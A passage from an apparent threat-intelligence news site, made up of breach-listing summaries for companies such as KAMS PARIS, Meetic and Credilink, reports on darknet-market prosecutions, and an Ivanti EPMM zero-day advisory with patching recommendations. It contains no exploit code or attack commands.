accessing the build that was mistakenly released over the weekend. Also stating that is not the result of a pre-load issue.](https://x.com/DarkWebInformer/status/2053908034896658511?s=20) ❗️ [Qilin Ransomware Claims Keller Williams Real Estate - Exton County as a Victim](https://x.com/DarkWebInformer/status/2053909903131972047?s=20) 💡 [Meme](https://x.com/DarkWebInformer/status/2053918879659999413?s=20) 💡 [I was curious to see how Session was doing with their fundraising goal to keep the app going. They have until July 8th to hit 1 million. Don't see that happening unless someone puts up a big number.](https://x.com/DarkWebInformer/status/2053928121020117264?s=20) ❗️ [CB FINANCIAL SERVICES, INC. has filed form 8-k due to a cybersecurity incident](https://x.com/DarkWebInformer/status/2053936634500890807?s=20) ❗️ [La Suite Numérique allegedly breached exposing over 18 million records from the French government digital workspace](https://x.com/DarkWebInformer/status/2053942217652187460?s=20) ❗️ [The hacked data of The Gentlemen Ransomware is up for sale for $10K BTC.](https://x.com/DarkWebInformer/status/2053955979499180507?s=20) ❗️ [AIRDC advertised as AI-powered hidden remote desktop control tool for Windows targets](https://x.com/DarkWebInformer/status/2053960003782844698?s=20) [darkwebinformer.com](https://darkwebinformer.com/)· [socials](https://darkwebinformer.com/socials)· [subscribe](https://darkwebinformer.com/pricing) © Dark Web Informer. All rights reserved. ### KAMS PARIS Allegedly Breached Exposing 187,927 Customer Records From the French Niche Perfumery URL: https://darkwebinformer.com/kams-paris-allegedly-breached-exposing-187-927-customer-records-from-the-french-niche-perfumery/ Last updated: 2026-05-11T21:44:55.000Z Breach Report · France # KAMS PARIS Allegedly Breached Exposing 187,927 Customer Records From the French Niche Perfumery A threat actor is selling the customer database of KAMS PARIS, a Parisian niche perfumery founded in 1960 and located at 6 Avenue de l’Opéra, specializing in rare niche perfumes, skincare, and beauty products with delivery across Europe. The actor states the database contains 187,927 lines and is being sold once for $350, with proof of funds required before any sample is shared. The CSV sample shows full identity records including French addresses, dates of birth, IBANs, and currency details. Post details Actor(s)\[Citizen\] moxzey SectorRetail / E-Commerce / Niche Perfumery TypeData Sale FormatCSV Price$350 (only selling once) Records187,927 CountryFrance Date10/05/2026 Compromised data - First name (firstname) - Last name (lastname) - Address - Zip code (zipcode) - City - Phone number (phoneNumber) - Date of birth (birtday) - IBAN - Country - Currency - Additional information Screenshots [ ![Screenshot 1](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/23785969872365987235987629837569876235.png) 01 ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/23785969872365987235987629837569876235.png) [ ![Screenshot 2](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/23785969872365987235987629837569876236.png) 02 ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/23785969872365987235987629837569876236.png) Want the non-blurred screenshots? Subscribe and check out the threat feed section. [darkwebinformer.com/pricing](https://darkwebinformer.com/pricing/) ### SAWTAD Allegedly Leaked Exposing 2,211 Files (2.19 GB) of SAW Sensor Diaper Tech R&D and SPMet Metrology Archive URL: https://darkwebinformer.com/sawtad-allegedly-leaked-exposing-2-211-files-2-19-gb-of-saw-sensor-diaper-tech-r-d-and-spmet-metrology-archive/ Last updated: 2026-05-11T19:07:36.000Z Breach Report · Global # SAWTAD Allegedly Leaked Exposing 2,211 Files (2.19 GB) of SAW Sensor Diaper Tech R&D and SPMet Metrology Archive A threat actor is selling a full archive described as one of the deepest technical leaks in the field of Surface Acoustic Wave (SAW) sensors and their application in smart diapers (Smart Diaper / Wetness Sensing). The actor states the leak is not just a collection of documents but the entire intellectual core of the SAW diaper sensing project, from initial ideation through prototyping to patent filing attempts, combined with metrology archive material from Sociedade Portuguesa de Metrologia (SPMet). The dump is a ZIP file preserving the original folder structure (Documents\\dms\\SawTAD + SAWTAD\_SRV\_STO + SPMet), totalling 2.19 GB across 2,211 files. Post details Actor(s)zestix SectorR&D / Sensor Technology / Metrology TypeIP and Technical Data Sale FormatZIP (original folder structure) Price$300 Records2,211 files / 2.19 GB RegionNot specified (SPMet content tied to Portugal) Date09/05/2026 Compromised data - SAW-TAD Project (Smart Absorbent Wireless Technology for Absorbent Devices): complete R&D documentation, provisional patents, schematic diagrams, Gerber/PCB files, Arduino/ESP32 code, prototype test reports (SDP\_01), and full mechanical and electrical design files - Prior Art and Competitor Patents including EP3086116B1 (Wireless SAW moisture sensor), US20190008698A1, JP5407413B2, TWI patents, and dozens of additional reference documents on wetness sensing - Scientific Papers and Theses: more than 20 complete papers on SAW sensors using PVDF, Quartz, AlN, GO, ZnO, flexible SAW, resonators, chemical/gas sensing, plus applications in TPMS and wireless passive sensors - SPMet Documents (Sociedade Portuguesa de Metrologia): full archive of CONFMET conferences 2011 to 2025, abstracts (resumos), peer-reviewed articles, financial reports, scientific council meeting minutes, and metrology standards - Patent and IP Documents: multiple patent drafts for diaper sensing systems, signed NDAs, correspondence with patent attorneys, business plans, and financial models - Prototypes and Hardware: firmware code, RFID and SAW reader schematics, test reports, BOMs, and manufacturing files - Presentations and Internal Documents: complete PowerPoint decks on Materials and Manufacturing, System Assembly, Medical Regulations, Investor presentations, and more Screenshots [ ![Screenshot 1](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/7398465978364598762598762398756978235.png) 01 ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/7398465978364598762598762398756978235.png) Want the non-blurred screenshots? Subscribe and check out the threat feed section. [darkwebinformer.com/pricing](https://darkwebinformer.com/pricing/) ### Google Threat Intelligence Group Reports First Known AI-Developed Zero-Day Exploit URL: https://darkwebinformer.com/google-threat-intelligence-group-reports-first-known-ai-developed-zero-day-exploit/ Last updated: 2026-05-11T16:34:46.000Z Google's Threat Intelligence Group has documented what it describes as the first confirmed instance of threat actors leveraging artificial intelligence to engineer a zero-day exploit, marking a significant escalation in how AI is being weaponized for cyberattacks. The exploit successfully circumvented multi-factor authentication protections in a web-based administrative tool. According to the report, attackers used AI systems to assist in discovering and developing the exploit code targeting a previously unknown vulnerability. The bypass allowed unauthorized access to administrative interfaces despite MFA being enabled, undermining one of the most widely recommended security controls for protecting privileged accounts. This finding represents a notable shift in the threat landscape. While security researchers and defenders have warned for years that generative AI could lower the barrier to producing sophisticated malware, most documented cases until now have involved AI being used for phishing content, social engineering scripts, or refinement of existing malicious code rather than original vulnerability research and exploit development. The report underscores growing concerns that AI tools are accelerating the offensive capabilities of threat actors, potentially compressing the timeline between vulnerability discovery and weaponization. Organizations relying on MFA as a primary defense layer may need to revisit their security architecture, layering in additional controls such as phishing-resistant authentication methods, behavioral analytics, and stricter access policies for administrative tools. Source: ### Mansoura University Allegedly Leaked Exposing 731 Contact Records From the Egyptian Academic Institution URL: https://darkwebinformer.com/mansoura-university-allegedly-leaked-exposing-731-contact-records-from-the-egyptian-academic-institution/ Last updated: 2026-05-11T16:35:02.000Z Breach Report · Egypt # Mansoura University Allegedly Leaked Exposing 731 Contact Records From the Egyptian Academic Institution A threat actor claims to have leaked a database from Mansoura University (mans.edu.eg), an Egyptian public university, releasing 731 records of individuals and entities affiliated with the institution. The actor states the leak is being released for free because the university and its affiliated \*.edu.eg domains did not respond or confirm anything regarding a previous leak. The post is attributed to INT3X with shoutouts to quellostanco, CrowStealer, and @bigF. Post details Actor(s)INT3X SectorEducation / University TypeData Leak FormatDatabase PriceFree Records731 CountryEgypt Date11/05/2026 Compromised data - Name (full name of the Dr or entity) - Work (email address or additional work details) - Telephone (landline, hotline, or mobile phone numbers) - Job (job title or department) - Workplace (workplace or affiliated organization) - Rowid (unique record identifier in the database) Screenshots [ ![Screenshot 1](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/273986598723648974265982365498723569872.png) 01 ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/273986598723648974265982365498723569872.png) Want the non-blurred screenshots? Subscribe and check out the threat feed section. [darkwebinformer.com/pricing](https://darkwebinformer.com/pricing/) ### German Authorities Shut Down Revived "Crimenetwork" Platform, Arrest Operator on Mallorca URL: https://darkwebinformer.com/german-authorities-shut-down-revived-crimenetwork-platform-arrest-operator-on-mallorca/ Last updated: 2026-05-10T16:09:08.000Z German law enforcement has dismantled the relaunched version of the criminal online marketplace "Crimenetwork" and arrested its alleged operator on the Spanish island of Mallorca, the Federal Criminal Police Office (BKA) and the Frankfurt Public Prosecutor's Office's cybercrime unit (ZIT) announced on May 8, 2026. The suspect, a 35-year-old German citizen, was detained at his Mallorca residence by a special unit of the Spanish National Police on the basis of a European arrest warrant. According to investigators, the man rebuilt an entirely new technical infrastructure under the same "Crimenetwork" name within days of the December 2024 takedown of the original platform and the arrest of its previous administrator. Spanish authorities executed two European arrest warrants against him, covering allegations of organized commercial fraud as well as the operation of a criminal trading platform on the darknet, and he is reportedly being held in Spanish extradition custody. > ‼️ German Authorities Shut Down Revived "Crimenetwork" Platform, Arrest Operator on Mallorca > > German law enforcement has dismantled the relaunched version of the criminal online marketplace "Crimenetwork" and arrested its alleged operator on the Spanish… [pic.twitter.com/60XzL0jRJh](https://t.co/60XzL0jRJh) > > — Dark Web Informer (@DarkWebInformer) [May 10, 2026](https://twitter.com/DarkWebInformer/status/2053507000244265063?ref%5Fsrc=twsrc%5Etfw) The reconstituted marketplace had grown into a substantial illicit operation before being shuttered. According to police, the platform most recently counted more than 22,000 users and over 100 sellers, who traded in stolen data, drugs, and forged documents. Users settled transactions in cryptocurrencies including Bitcoin, Litecoin, and Monero, and evidence seized during the operation points to platform revenues exceeding 3.6 million euros, with the operator collecting commissions on sales while sellers paid monthly fees for advertising and sales licenses. Authorities provisionally secured assets of roughly 194,000 euros directly tied to "Crimenetwork" and obtained extensive user and transaction data expected to fuel further investigations. The case follows the recent sentencing of the original platform's administrator: in March 2026, the Gießen Regional Court handed down a prison term of seven years and ten months and ordered the confiscation of more than ten million euros in criminal proceeds, though the verdict is not yet final. BKA Cybercrime division head Carsten Meywirth framed the action bluntly, saying the relaunch of Crimenetwork had failed and that another administrator would now have to answer to a German court, a reminder, he said, that "cybercrime does not pay." Source: ### Kingdom Market Admin Sentenced to 16 Years in Prison URL: https://darkwebinformer.com/kingdom-market-admin-sentenced-to-16-years-in-prison/ Last updated: 2026-05-08T19:37:58.000Z Alan Bill, a 33-year-old Slovakian man from Bratislava, was sentenced Thursday to 200 months (16 years and 8 months) in federal prison by U.S. District Judge Cristian M. Stevens for his role in operating Kingdom Market, a darknet marketplace that ran from March 2021 to December 2023\. Bill pleaded guilty in January to one felony count of conspiracy to distribute controlled substances, admitting he provided web-administration services for the site, received cryptocurrency from a Kingdom-linked wallet, helped create Kingdom forum pages on Reddit and Dread, and posted on the marketplace's social media accounts. The judge found Bill was a leader or organizer of the conspiracy and was aware of what vendors were selling on the platform. Kingdom Market facilitated thousands of transactions involving illegal drugs, stolen financial information, fraudulent identification documents, counterfeit currencies, and computer malware, with payments made in cryptocurrency. Server records showed more than 1,500 heroin sales and nearly 600 sales of purported Oxycodone, with prosecutors stating Bill and his co-conspirators knew fentanyl was being mixed into other products. Undercover federal investigators purchased fentanyl, methamphetamine, and a U.S. passport from the marketplace. Bill was arrested on December 15, 2023, at Newark Liberty International Airport with electronic devices containing evidence of his involvement, and he agreed to forfeit five types of cryptocurrency along with the Kingdommarket\[.\]live and Kingdommarket\[.\]so domains, which are now defunct. ![](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/kingdom_market_seizure_banner.jpg) Source: ### Meetic Allegedly Leaked Exposing 7 Million User Records From the French Online Dating Platform URL: https://darkwebinformer.com/meetic-allegedly-leaked-exposing-7-million-user-records-from-the-french-online-dating-platform/ Last updated: 2026-05-08T16:10:31.000Z Breach Report · France # Meetic Allegedly Leaked Exposing 7 Million User Records From the French Online Dating Platform A threat actor claims to have leaked a database from Meetic, a major French online dating platform, releasing 7,169,561 records for free under the hashtag #freebreach3d. The TXT sample shows usernames, emails, registration channels, IP addresses, and partial profile data with some entries dating back to 2010-2011. Post details Actor(s)NormalLeVrai SectorOnline Dating TypeData Leak FormatTXT PriceFree Records7,169,561 CountryFrance Date07/05/2026 Compromised data - User ID - Username / nickname - First name - Email address - Registration channel (Web, FR, etc.) - Registration date and timestamp - Gender (H/F/S) - Country - Postal code and region (e.g., Paris, Île-de-France, Champagne-Ardenne) - IP address - Referral/source (e.g., googleR, effi\_coreg Vendome1669) - Account flags and status indicators Screenshots [ ![Screenshot 1](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/723879542798356982763598723598765.png) 01 ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/723879542798356982763598723598765.png) [ ![Screenshot 2](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/723879542798356982763598723598766.png) 02 ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/723879542798356982763598723598766.png) Want the non-blurred screenshots? Subscribe and check out the threat feed section. [darkwebinformer.com/pricing](https://darkwebinformer.com/pricing/) ### Credilink Allegedly Breached Exposing 243 Million Records From the Brazilian Credit Data Provider URL: https://darkwebinformer.com/credilink-allegedly-breached-exposing-243-million-records-from-the-brazilian-credit-data-provider/ Last updated: 2026-05-08T15:42:19.000Z Breach Report · Brazil # Credilink Allegedly Breached Exposing 243 Million Records From the Brazilian Credit Data Provider A threat actor is selling a 243 million record dataset attributed to credilink.com.br, described in the post as a Brazilian credit information and risk analysis provider serving financial institutions and retailers. The seller offers a 12 million record sample for free download and points buyers to an external marketplace for the full package, with samples showing CPF national IDs, addresses, vehicle ownership, and presumed income. Post details Actor(s)Blastoize SectorFinancial services / Credit bureau TypeData Sale FormatCSV-style records PriceNegotiable (12M free sample, full DB on external marketplace) Records243,000,000 (2024 dataset) CountryBrazil Date07/05/2026 Compromised data - CPF national ID - Full name (NOME) and mother’s name (NOME\_MAE) - Address type, street, number, complement - Neighborhood (BAIRRO), city (CIDADE), state (ESTADO), UF, postal code (CEP) - Date of birth (DT\_NASCIMENTO) - Gender (SEXO) - Email address - Death flag and death date (FLAG\_OBITO, DT\_OBITO) - Federal tax/receita status (STATUS\_RECEITA\_FEDERAL) - Corporate role/share (PCT\_CARGO\_SOCIETARIO) - Vehicle ownership (CBO, QT\_VEICULOS) - Up to five vehicles each with brand, model, and year (MARCA/MODELO/ANO\_VEICULO 1-5) - Presumed income (RENDA\_PRESUMIDA) and income range (FAIXA\_RENDA) Screenshots [ ![Screenshot 1](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/72348971298742358796897231659873265981.png) 01 ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/72348971298742358796897231659873265981.png) Want the non-blurred screenshots? Subscribe and check out the threat feed section. [darkwebinformer.com/pricing](https://darkwebinformer.com/pricing/) ### LDLC Allegedly Leaked Exposing 1.5 Million Customer Records From the French Tech Retailer URL: https://darkwebinformer.com/ldlc-allegedly-leaked-exposing-1-5-million-customer-records-from-the-french-tech-retailer/ Last updated: 2026-05-08T15:26:02.000Z Breach Report · France # LDLC Allegedly Leaked Exposing 1.5 Million Customer Records From the French Tech Retailer A threat actor claims to have leaked a database from LDLC, a major French retailer of computers, components, smartphones, and gaming/audio/TV equipment, releasing 1,504,635 records for free under the hashtag #freebreach3d. The JSON sample shows individual customer profiles with addresses, contact details, picking contacts, and VAT regime data. Post details Actor(s)NormalLeVrai SectorRetail / Consumer Electronics TypeData Leak FormatJSON PriceFree Records1,504,635 CountryFrance Date07/05/2026 Compromised data - Internal IDs (address ID, picking contact ID) - Civility, first name, last name - Email address - Mobile phone number - Full address (postal code, city, country) - Country code and web ID - Customer code and position - Primary address flag - Individual/account type - VAT regime - Account creation timestamp Screenshots [ ![Screenshot 1](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/623587235786258976298735629359872323-2.png) 01 ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/623587235786258976298735629359872323-2.png) Want the non-blurred screenshots? Subscribe and check out the threat feed section. [darkwebinformer.com/pricing](https://darkwebinformer.com/pricing/) ### Community Choice Credit Union Allegedly Breached Exposing 1M+ Premium Credit Client Records URL: https://darkwebinformer.com/community-choice-credit-union-allegedly-breached-exposing-1m-premium-credit-client-records/ Last updated: 2026-05-08T15:05:54.000Z Breach Report · United States # Community Choice Credit Union Allegedly Breached Exposing 1M+ Premium Credit Client Records A threat actor is advertising what they describe as a US banking / premium credit client dataset tied to communitychoicecu.com, releasing a 1M+ record sample with full card numbers, names, issuing banks, and addresses. A second screenshot shows what appears to be an admin dashboard view of the credit union with 1,028,368 members, $512.48M in loans, and $1.02B in deposits, suggesting backend access claims alongside the data sale. Post details Actor(s)MDGhost (The BlackH4t MD-Ghost) SectorBanking / Credit Union TypeData Sale (with apparent admin panel access) FormatCSV (compressed) Records1,000,000+ CountryUnited States Date07/05/2026 Compromised data - Card number - Full name - Issuing bank - Card type (credit/debit) - Address, city, state - Email - Mobile number - Apparent admin dashboard view: members, accounts, loans, deposits - Member growth, account summary, recent activity logs - Audit logs, settings, support module visibility Screenshots [ ![Screenshot 1](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/123795862987356982735691823569872356981.png) 01 ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/123795862987356982735691823569872356981.png) [ ![Screenshot 2](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/123795862987356982735691823569872356982.png) 02 ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/123795862987356982735691823569872356982.png) Want the non-blurred screenshots? Subscribe and check out the threat feed section. [darkwebinformer.com/pricing](https://darkwebinformer.com/pricing/) ### Ivanti Warns of New EPMM Zero-Day Exploited Using Credentials Stolen in January Attacks URL: https://darkwebinformer.com/ivanti-warns-of-new-epmm-zero-day-exploited-using-credentials-stolen-in-january-attacks/ Last updated: 2026-05-07T18:03:41.000Z ⚠ Zero-Day - Active Exploitation CVE CVE-2026-6973 CVSS 7.2 High Type Authenticated RCE KEV Added May 7 ## Vulnerability Overview Ivanti has [issued an urgent security advisory](https://hub.ivanti.com/s/article/May-2026-Security-Advisory-Ivanti-Endpoint-Manager-Mobile-EPMM-Multiple-CVEs?language=en%5FUS) for its Endpoint Manager Mobile (EPMM) product, disclosing five vulnerabilities including one that is actively exploited in the wild. Tracked as **CVE-2026-6973**, the flaw is an Improper Input Validation vulnerability that allows a remotely authenticated attacker with administrative privileges to execute arbitrary code on affected EPMM servers running version 12.8.0.0 and earlier. CISA [added CVE-2026-6973 to its Known Exploited Vulnerabilities catalog today](https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field%5Fcve=CVE-2026-6973), May 7, 2026, ordering federal agencies to apply mitigations by May 10 - just three days. Ivanti confirmed that exploitation is occurring at a "very limited" number of customers but warned that advanced AI models have dramatically collapsed the time-to-exploit window from days to mere hours after public disclosure. As [BleepingComputer reported](https://www.bleepingcomputer.com/news/security/ivanti-warns-of-new-epmm-flaw-exploited-in-zero-day-attacks/), Ivanti has high confidence that the admin credentials used to exploit CVE-2026-6973 were obtained from earlier exploitation of CVE-2026-1281 and CVE-2026-1340, two critical unauthenticated RCE flaws disclosed in January 2026\. Organizations that followed Ivanti's January recommendation to rotate all EPMM admin passwords have significantly reduced exposure to this new attack. [Shadowserver is currently tracking over 850 exposed EPMM instances online](https://cybersecuritynews.com/ivanti-epmm-0-day-exploited/), with the majority in Europe (508) and North America (182). CVE ID CVE-2026-6973 CVSS Score 7.2 - High Vulnerability Type Improper Input Validation (CWE-20) Attack Vector Network (Remote) Authentication Admin Required Impact Remote Code Execution Vendor Ivanti Product Endpoint Manager Mobile (EPMM) Exploitation Status Active - In the Wild CISA KEV Added May 7, 2026 KEV Deadline May 10, 2026 Patch Status Fixed - 12.6.1.1 / 12.7.0.1 / 12.8.0.1 ## Technical Details CVE-2026-6973 is an Improper Input Validation vulnerability in Ivanti EPMM (formerly MobileIron) that enables a remotely authenticated user with administrative access to execute arbitrary code on the underlying server. The flaw affects all on-premises EPMM deployments running versions prior to 12.6.1.1, 12.7.0.1, and 12.8.0.1. While the vulnerability requires valid admin credentials to exploit, [the Belgian Centre for Cybersecurity (CCB) highlighted](https://ccb.belgium.be/advisories/warning-authenticated-remote-code-execution-vulnerability-ivanti-epmm-exploited-patch) that these credentials are being sourced from earlier zero-day campaigns. In January 2026, two critical unauthenticated RCE flaws (CVE-2026-1281 and CVE-2026-1340) were disclosed and [widely exploited](https://unit42.paloaltonetworks.com/ivanti-cve-2026-1281-cve-2026-1340/), giving attackers access to admin account passwords. Those stolen credentials are now being reused to exploit CVE-2026-6973 at organizations that never rotated their passwords. The vulnerability only affects on-premises EPMM deployments. Ivanti Neurons for MDM (the cloud-based product), Ivanti EPM, Ivanti Sentry, and all other Ivanti products are not affected. Ivanti also disclosed four additional high-severity EPMM vulnerabilities in the same advisory, though none of those have confirmed in-the-wild exploitation. Chained with January Zero-Days This is not a standalone attack. Ivanti confirmed with high confidence that the admin credentials being used to exploit CVE-2026-6973 originated from the January 2026 exploitation of CVE-2026-1281 and CVE-2026-1340\. Organizations that rotated all local EPMM admin passwords after the January advisory are at significantly lower risk. Those that did not should assume their admin credentials are compromised and treat CVE-2026-6973 as an active threat requiring immediate action. ## Affected Versions All on-premises EPMM deployments running versions prior to 12.6.1.1, 12.7.0.1, and 12.8.0.1 are affected. Today's advisory also covers four additional CVEs disclosed alongside CVE-2026-6973, none of which have confirmed exploitation. | CVE | CVSS | Type | Auth Required | Exploited | | ----------------- | ---- | ------------------------- | ------------- | ------------ | | **CVE-2026-6973** | 7.2 | Improper Input Validation | Yes (Admin) | Yes - Active | | CVE-2026-5786 | 8.8 | Privilege Escalation | Yes (Low) | No | | CVE-2026-5787 | 8.9 | Certificate Impersonation | No | No | | CVE-2026-5788 | 7.0 | Improper Access Control | No | No | | CVE-2026-7821 | 7.4 | Certificate Validation | No | No | EPMM 12.6.x EPMM 12.7.x EPMM 12.8.x 12.6.1.1 / 12.7.0.1 / 12.8.0.1 ## Recommendations 1. **Apply the EPMM security patch immediately.** Update to version 12.6.1.1, 12.7.0.1, or 12.8.0.1 depending on your release train. Ivanti states the patches take seconds to apply and cause no downtime. Refer to the [Ivanti security advisory](https://hub.ivanti.com/s/article/May-2026-Security-Advisory-Ivanti-Endpoint-Manager-Mobile-EPMM-Multiple-CVEs?language=en%5FUS) for detailed installation steps. 2. **Rotate all EPMM admin credentials now.** If you did not reset admin passwords following the January 2026 advisory for CVE-2026-1281 and CVE-2026-1340, do so immediately. Attackers are actively reusing stolen admin credentials from those earlier campaigns. 3. **Audit admin accounts.** Review all accounts with administrative privileges on your EPMM instance. Remove unnecessary admin access, disable dormant accounts, and enforce multi-factor authentication where supported. 4. **Check for indicators of compromise.** Previous EPMM exploitation campaigns have deployed webshells and reverse shells for persistent access. Review Apache access logs, check for unexpected processes, and search for unfamiliar files on the EPMM server. Ivanti has published analysis guidance for identifying exploitation attempts. 5. **Restrict network exposure.** Ensure EPMM management interfaces are not directly accessible from the public internet. Place the admin portal behind a VPN or Zero Trust access solution to limit the attack surface for authenticated exploitation scenarios. ## Context This marks the third wave of zero-day exploitation against Ivanti EPMM in less than 18 months. In 2023, CVE-2023-35078 and CVE-2023-35082 were exploited to breach government agencies worldwide, with some attacks attributed to Chinese state-sponsored threat groups. In January 2026, CVE-2026-1281 and CVE-2026-1340 triggered another round of [widespread exploitation](https://www.esentire.com/security-advisories/ivanti-zero-day-vulnerabilities-cve-2026-1281-cve-2026-1340-disclosed) that included webshell deployment and cryptominer installation. Now, CVE-2026-6973 represents a direct continuation of that January campaign - attackers are weaponizing previously stolen credentials to maintain access. CISA has now flagged 33 Ivanti vulnerabilities as exploited in the wild, with [12 of those abused by various ransomware operations](https://www.bleepingcomputer.com/news/security/ivanti-warns-of-new-epmm-flaw-exploited-in-zero-day-attacks/). The three-day CISA KEV deadline - May 10, 2026 - is among the shortest remediation windows the agency has ever issued, reflecting the severity and active exploitation of this vulnerability. The consistent targeting of EPMM underscores its high-value position in enterprise mobile device management infrastructure, where a single compromised MDM server can provide attackers with control over an organization's entire mobile fleet. ### HOMES Real Estate Platform Allegedly Leaked Exposing 7 Million Agent and Investor Records URL: https://darkwebinformer.com/homes-at-world-allegedly-leaked-exposing-7-million-real-estate-agent-and-investor-records/ Last updated: 2026-05-07T16:44:49.000Z Breach Report · Global # Homes.at.world Allegedly Leaked Exposing 7 Million Real Estate Agent and Investor Records A threat actor claims to be selling a 2.47GB CSV database from real estate platform homes.at.world, totaling 7,023,773 lines split between 4,883,773 agent records and 2,140,000 investor records. The samples show US real estate agents (Arizona) and UAE-based property investors, with the seller accepting escrow. Post details Actor(s)Moon\_WALK SectorReal Estate / PropTech TypeData Sale FormatCSV, 2.47GB Price$1,800 (negotiable, escrow accepted) Records7,023,773 (4.88M agents + 2.14M investors) RegionGlobal (US & UAE samples) Date07/05/2026 Compromised data - Name and alternate name (aname) - Email and phone / mobile - Address, city, state, country - Latitude and longitude - Office telephone, agent type - Active status, building name - Social media URLs (Facebook, Instagram, Twitter, LinkedIn, YouTube) - Registration number and BSAX - Rent and sale flags, country counts, creation date - Unified number and data number - Seller / buyer flag, nationality, ID number - Birth date, expiry date - Developer (m\_developer), property type, land number - Project name, building number/name - Size in meters and feet, GFA, FAR, floors - Procedure value, currency, price per sqft - Plot pre-registration number, property number - DM number / sub number, land sub number - Entry name, modified name, modified time - Google Map coordinates and IM name Screenshots [ ![Screenshot 1](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/3325789237854628576293874927831.png) 01 ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/3325789237854628576293874927831.png) [ ![Screenshot 2](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/3325789237854628576293874927832.png) 02 ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/3325789237854628576293874927832.png) [ ![Screenshot 3](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/3325789237854628576293874927833.png) 03 ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/3325789237854628576293874927833.png) [ ![Screenshot 4](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/3325789237854628576293874927834.png) 04 ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/3325789237854628576293874927834.png) Want the non-blurred screenshots? Subscribe and check out the threat feed section. [darkwebinformer.com/pricing](https://darkwebinformer.com/pricing/) ### US Non-Emergency Medical Transport Network Allegedly Breached Exposing 500K+ Patient Records and Live Admin Access URL: https://darkwebinformer.com/us-non-emergency-medical-transport-network-allegedly-breached-exposing-500k-patient-records-and-live-admin-access/ Last updated: 2026-05-07T15:30:08.000Z Breach Report · United States # US Non-Emergency Medical Transport Network Allegedly Breached Exposing 500K+ Patient Records and Live Admin Access A threat actor claims to be selling live, authenticated admin panel access to a major US Non-Emergency Medical Transportation (NEMT) platform, advertising real-time control over operations rather than a static dump. The listing includes 500,000+ patient records, the ability to create fake provider accounts and spawn ride assignments, and access to a 200+ subcontractor network reportedly integrated with Lyft and Uber Health, with the source code of the underlying “Smart-Data-Hub” codebase included. Post details Actor(s)boltak SectorHealthcare / Medical transportation (NEMT) TypeAccess Sale (live admin) + Data Sale + Source Code FormatWeb admin panel access, 500K+ records, full codebase PriceNegotiable (open to offers) Records500,000+ patients CountryUnited States Date07/05/2026 Compromised data and capabilities - Live admin dashboard with operational control - Provider creation (registering fake companies to receive real ride assignments) - Patient demographic data and full PII - SSNs - Insurance details (Medi-Cal and others) - Sensitive medical records - 200+ subcontractor network access (Lyft, Uber Health integrations) - Active trips, driver assignments, billing details - Trip “completion” and invoice generation without service - Source code of Smart-Data-Hub backend - Competitive intelligence on routes and pricing across 200+ competitors Screenshots [ ![Screenshot 1](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/42437859298375698273562983476982746334987239872.png) 01 ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/42437859298375698273562983476982746334987239872.png) [ ![Screenshot 2](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/42437859298375698273562983476982746334987239873.png) 02 ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/42437859298375698273562983476982746334987239873.png) Want the non-blurred screenshots? Subscribe and check out the threat feed section. [darkwebinformer.com/pricing](https://darkwebinformer.com/pricing/) ### Antel TuID Digital Allegedly Breached Exposing 8GB of Data From the Uruguayan State Telecom’s E-Government Platform URL: 